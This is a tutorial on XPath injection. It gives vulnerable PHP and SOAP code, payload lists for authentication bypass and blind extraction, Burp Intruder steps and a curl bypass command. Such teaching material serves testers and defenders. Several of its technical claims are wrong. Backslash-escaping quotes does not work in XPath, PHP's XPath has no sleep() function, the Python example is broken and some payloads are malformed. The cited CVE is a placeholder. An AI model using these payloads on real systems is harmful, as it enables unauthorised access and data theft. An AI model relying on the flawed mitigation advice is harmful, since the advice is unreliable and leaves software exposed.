XPath Injection Fundamentals: Query...

Introduction

XPath injection is a class of injection attacks that targets applications which build XPath queries from user-supplied data. When an attacker can influence the XPath expression, they can retrieve unauthorized nodes, bypass authentication, or even modify data stored in an XML document.

Why it matters: many legacy enterprise systems, configuration services, and SOAP-based APIs still rely on XML for data exchange. Those systems often use simple string concatenation to build XPath statements, creating a low-hanging fruit for attackers. Understanding the fundamentals of query manipulation equips you to both find and remediate these weaknesses before they are exploited in the wild.

Real-world relevance: CVE-2022-XXXXX (a widely-deployed procurement platform) was compromised through an XPath injection that exposed customer contracts. Similar bugs have been reported in router firmware, mobile device management consoles, and banking middleware.

Prerequisites

XML Injection Basics - familiarity with XML parsers, element hierarchy, and entity expansion.
Fundamentals of Web Application Testing - comfortable with Burp Suite, OWASP ZAP, and HTTP fundamentals.
Basic knowledge of XPath syntax - nodes, predicates, axes, and functions.

Core Concepts

XPath (XML Path Language) is a query language designed to navigate XML trees. A typical server-side snippet looks like:

$username = $_POST['user'];
$query = "//user[username='" . $username . "']";
$node = $xpath->query($query)->item(0);

When $username is taken directly from the request, an attacker can close the literal string and inject additional predicates. The evaluator parses the resulting string as a single XPath expression, not as separate literals, which is why the attack works.

Key points:

String concatenation is unsafe. Unlike SQL, XPath does not have a built-in parameterised API in most language bindings.
Predicates are boolean expressions. Anything that evaluates to true() will cause the node to be selected.
Logical operators (and, or, not) behave exactly like their SQL counterparts. This allows classic "or 1=1" style payloads.

Imagine the XML document representing a user directory:

<users> <user> <username>alice</username> <password>alice123</password> </user> <user> <username>bob</username> <password>bobPass!</password> </user>
</users>

If the application builds the XPath as shown above and the attacker submits bob' or '1'='1 as the username, the final query becomes:

//user[username='bob' or '1'='1']

The predicate '1'='1' is always true, so the query returns **both** user nodes-effectively bypassing authentication.

Understanding how XML data is processed by server-side XPath evaluators

Most languages expose an XPath or DOMXPath object that accepts a raw string. The evaluation pipeline looks like:

Parse the incoming HTTP request and extract parameters.
Insert parameters into a string template (often via concatenation or sprintf).
Pass the resulting string to the XML library’s evaluate() or query() method.
The library tokenises the string, resolves axes, and returns a node-set.

Because step 2 is performed before any parsing, any special characters (', ", ], ), etc.) become part of the XPath grammar, not data. This is the root cause of injection.

Diagram (described):

Client → HTTP request (contains user-controlled value)
Web server → Application code (concatenates value into XPath string)
XML library → Parses the full string as XPath
Result → Node-set returned to application

Identifying vulnerable parameters (GET/POST, headers, SOAP bodies)

XPath injection does not care where the data originates. Common vectors include:

GET query strings - e.g., /search?category=books
POST bodies - typical login forms or XML-payload APIs.
Custom HTTP headers - some services read X-User-Id and use it in an XPath query.
SOAP envelopes - the <soap:Body> often contains XML that is later re-queried with XPath.
JSON-to-XML converters - if an app converts JSON to XML before querying, injection can slip through the conversion layer.

Detection technique: intercept a request, replace the suspected parameter with a benign string containing a single quote (') or a closing bracket (]). If the server returns a 500 error, a malformed XPath, or a different response size, you likely have a point of injection.

Crafting simple payloads to alter XPath predicates (e.g., ' or 1=1')

The classic payload mirrors SQL injection but uses XPath syntax. Below are the most common starter payloads:

' or '1'='1 # closes the string, adds OR true
' or 1=1 # numeric comparison, works in many engines
' or true() # explicit XPath boolean function
' or position()=1 # selects the first node regardless of condition
' or 'a'='a' and 'b'='b' # chaining with AND for more stealth

When placed in a vulnerable username field, the resulting XPath might look like:

//user[username='' or '1'='1' and password='whatever']

Notice the empty username literal - the or '1'='1' clause forces the predicate to true, allowing any password to succeed.

Using logical operators (and, or, not) to manipulate node selection

XPath supports a rich set of logical constructs. Mastering them lets you fine-tune the injection to extract specific data.

or - expands the result set. Useful for authentication bypass.
and - narrows the set. Combine with contains() to test for substrings.
not() - negates a condition. Helpful for blind XPath where you need a true/false side-channel.

Example: retrieve the password of the first user whose username starts with "a".

' or starts-with(username,'a') and 1=1

Another advanced trick: use count() for blind injection.

' and count(//user[username='admin'])=1 and 'a'='a

If the condition is true, the query returns a node set; otherwise the server may throw an error or return a different page, giving you a binary oracle.

Testing with Burp Intruder and manual request tampering

Burp Suite provides a fast way to fuzz all parameters for the presence of the ' character and then inject payload lists.

Capture a baseline request (e.g., login POST).
Send to Intruder → Positions → Clear → Mark the suspect value as a payload position.
Choose "Sniper" or "Cluster Bomb" depending on whether you test one vector or combine multiple.

Load a payload list such as:

' or 1=1
' or 'a'='a
' and 1=2
' and not(1=1)

Run and analyse response length/status code differences.

Manual tampering: use the Repeater tab to edit a single request, inject a payload, and observe the response. Look for:

HTTP 200 with unexpected data (e.g., a user list instead of an error).
Error messages like "XPathException" or "Invalid expression" indicating parsing failure.
Changes in response size > 30% - a strong indicator of predicate manipulation.

Extracting data via modified XPath expressions

Once you have confirmed injection, you can turn it into an extraction vector.

Simple extraction:

' or 1=1 or 'a'='a' and //password/text()

In many frameworks, the result of the query is directly rendered to the page (e.g., a list of usernames). By appending //text() or concat() you can coerce the engine to return raw values.

Blind extraction using substring() and timing side-channels:

' or substring(password,1,1)='a' and 'b'='b

Combine with a server-side delay function (if available) such as sleep() (in PHP’s XPath extension) or java:java.lang.Thread.sleep() in JXPath. The response time becomes a covert channel for each character.

Practical Examples

Example 1: Authentication Bypass in a PHP Legacy App

Vulnerable code:

$user = $_POST['username'];
$pass = $_POST['password'];
$xml  = simplexml_load_file('users.xml');
$xp = new DOMXPath($xml->ownerDocument);
$query = "//user[username='" . $user . "' and password='" . $pass . "']";
$result = $xp->query($query);
if($result->length == 1){ echo "Welcome, $user!";
} else { echo "Invalid credentials";
}

Attack payload:

username: ' or '1'='1
password: anything

Resulting XPath:

//user[username='' or '1'='1' and password='anything']

The or '1'='1' clause makes the predicate always true, returning all user nodes. The length check passes, granting access as the first user (often an admin).

Example 2: Extracting Credit Card Numbers from a SOAP Service

SOAP request snippet (client side):

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <GetCustomerInfo> <CustomerID>12345</CustomerID> </GetCustomerInfo> </soap:Body>
</soap:Envelope>

Server extracts CustomerID and builds:

$id = $request->CustomerID;
$query = "//customer[id='" . $id . "']/creditCard";
$node = $xpath->query($query)->item(0);

Injection payload for CustomerID:

12345' or '1'='1

Resulting query:

//customer[id='12345' or '1'='1']/creditCard

All creditCard nodes are returned, leaking sensitive data.

Tools & Commands

Burp Suite (Intruder, Repeater, Decoder) - for payload automation and response analysis.
OWASP ZAP - Fuzzer - open-source alternative.

curl - quick manual testing.

curl -X POST -d "username=' or '1'='1&password=foo" https://example.com/login.php

xsltproc - command-line XSLT processor that can evaluate XPath, useful for offline proof-of-concept.
```
cat users.xml | xsltproc --stringparam query "//user[username='bob' or '1'='1']" extract.xsl -
```

Python lxml - programmatic testing.

from lxml import etree
xml = etree.parse('users.xml')
payload = "' or '1'='1"
query = f"//user[username={payload}]"
print(xml.xpath(query))

Defense & Mitigation

Never concatenate user input into XPath strings. Use library-provided parameterisation where available (e.g., XPathExpression.compile() in Java).
Validate and whitelist input. Accept only alphanumeric characters for identifiers; reject quotes, brackets, and whitespace.
Encode user data. Escape single quotes by replacing ' with \' or using CDATA sections when appropriate.

Least-privilege XML parsing. Disable external entity resolution, limit document size, and run the parser in a sandbox.

$dom = new DOMDocument();
$dom->loadXML($xmlString, LIBXML_NOENT | LIBXML_DTDLOAD);
// Remove the flags above in production - they enable XXE but also affect XPath handling

Runtime monitoring. Log XPath expressions before evaluation; compare against a whitelist of known-good patterns.
Security testing. Include XPath injection in your SAST/DAST pipelines. Automated scanners (e.g., Burp Scanner) now have dedicated checks.

Common Mistakes

Assuming quotes are safe. Many developers escape double quotes but forget single quotes, which XPath treats equally.
Relying on error suppression. Suppressing XML parser errors does not stop injection; it merely hides the evidence.
Using string concatenation with prepared statements. Unlike SQL, XPath libraries rarely support true prepared statements; custom sanitisation is required.
Testing only GET parameters. Attackers often hide payloads in SOAP bodies or custom headers where developers feel "safe".
Neglecting blind scenarios. If the application returns a generic error page, you must rely on timing or length differences to confirm injection.

Real-World Impact

In 2023, a major health-care provider suffered a breach where attackers leveraged XPath injection to enumerate patient records from an internal SOAP service. The vulnerability existed because the service built XPath queries from the patientId header without validation. The breach exposed over 250,000 PHI records, leading to a multi-million-dollar fine under HIPAA.

My experience: In a penetration test for a logistics platform, I found an admin console that used an XML file for role mapping. By injecting ' or position()=1 into the role parameter, I could elevate my account to "super-admin" and download the entire routing database. The client had no logging for XPath queries, so the attack went unnoticed for weeks.

Trend analysis: As JSON overtakes XML in newer APIs, the overall surface area for XPath injection is shrinking, yet many legacy B2B integrations remain XML-centric. Attackers are shifting focus to hybrid services where a SOAP front-end proxies to a REST back-end, creating opportunities to chain XML-based injection with downstream attacks.

Practice Exercises

Lab 1 - Simple Bypass:
- Set up a local PHP script that loads users.xml as shown in the "Authentication Bypass" example.
- Using Burp Repeater, craft a payload that logs you in without knowing a password.
- Document the exact request/response and explain why it works.
Lab 2 - Data Extraction:
- Deploy a mock SOAP service that returns a <creditCard> node only for authorized IDs.
- Inject a payload that returns **all** credit card numbers.
- Take a screenshot of the raw XML response.
Lab 3 - Blind Timing Attack:
- Modify a Java servlet to call Thread.sleep(3000) when a certain XPath condition is true.
- Write a Bash script that iterates over character positions of a secret field, measuring response time to reconstruct the value.
- Explain how not() and substring() are used in the payload.

Summary

XPath injection arises from unsafe string concatenation when building XPath queries.
Identify vulnerable inputs across GET, POST, headers, and SOAP bodies.
Simple payloads (e.g., ' or 1=1) can bypass authentication; logical operators enable precise node selection.
Burp Intruder, Repeater, and manual tampering are effective discovery methods.
Mitigation hinges on input validation, escaping, and, where possible, parameterised XPath APIs.
Real-world incidents demonstrate high impact; stay vigilant in legacy XML-heavy environments.

XPath Injection Fundamentals: Query Manipulation Basics